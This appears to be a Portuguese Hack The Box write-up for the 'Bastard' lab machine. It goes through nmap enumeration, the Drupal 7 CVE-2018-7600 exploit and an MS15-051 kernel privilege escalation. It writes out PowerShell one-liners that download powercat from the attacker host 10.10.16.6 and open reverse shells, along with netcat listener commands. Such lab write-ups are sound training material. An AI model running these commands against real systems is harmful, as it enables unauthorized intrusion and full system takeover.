Skip to content

Bastard

Referência em video

Resumo

Enumeração Web
Traduzir exploit de python 2 para python 3
Obtendo a execução de comando no servidor (Drupal 7 - CVE-2018-7600)
Escalação de privilégio (Enumeração de permissões de usuário)
Enumeração da versão do windows (kernel exploit)
Exploração de kernel

Enumeração

Como sempre, começamos com a enumeração básica de serviços:

TCP

sudo nmap_enum bastard.htb

qownnotes-media-wEuSjP

e

sudo nmap -p- -T5 --max-retries 0 -n -Pn bastard.htb

Enumeração UDP 

sudo nmap -p 111,113,53,161,500,2049 bastard.htb

qownnotes-media-clwNkB

Enumeração Web

Com a presença de um serviço web, nosso primeiro alvo nessa máquina (o critério de onde começar ou por qual serviço você deve começar vai de seu feeling mesmo) já identificamos um drupal lá. Analisando os cabeçalhos na resposta HTTP, foi possível identificar que é um Drupal 7. Por isso já fizemos uma procura por exploits para esse cara:

searchsploit drupal 7.0

qownnotes-media-QghQLr

Aqui encontramos alguns exploits, mas o que funcionou foi esse cara aqui:

drupa7-CVE-2018-7600.py

Exploitation

python drupa7-CVE-2018-7600.py -c "powershell -ExecutionPolicy bypass -c \"iex(new-object system.net.webclient).downloadstring('http://10.10.16.6/powercat.ps1');powercat -e cmd -c 10.10.16.6 -p 8081\""

Na máquina do Kal Linux temos de entregar o payload e subir o listener:

python -m http.server 80
nc -nlvp 8081

Depois disso, já conseguimos a shell:

qownnotes-media-BbSADJ

Então aqui já conseguimos a shell

Escalação de Privilégio

ou Escalação de Privilégios, vamos começar com:

Enumeração de permissões do usuário

whoami /priv

ou 

whoami /all

Identificamos o SeImpersonate, porém, sem sucesso na exploração.

Porém, ao analisar a versão do Windows, se tratava de um 2008 R2 SEM PATCHES!!! Isso foi interessante pra gente utilizar a exploração de kernel para subir privilégio na máquina:

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/README.md

Nesse link encontramos vários exploits, dentre eles o que funcionou já está destacado.

ms15-01.exe "powershell -ExecutionPolicy bypass -c \"iex(new-object system.net.webclient).downloadstring('http://10.10.16.6/powercat.ps1');powercat -e cmd -c 10.10.16.6 -p 8082\""

Basta subir o listener no Kali Linux para obter a shell reverse com usuário System!! :D

nc -nlvp 8082

qownnotes-media-trwsRB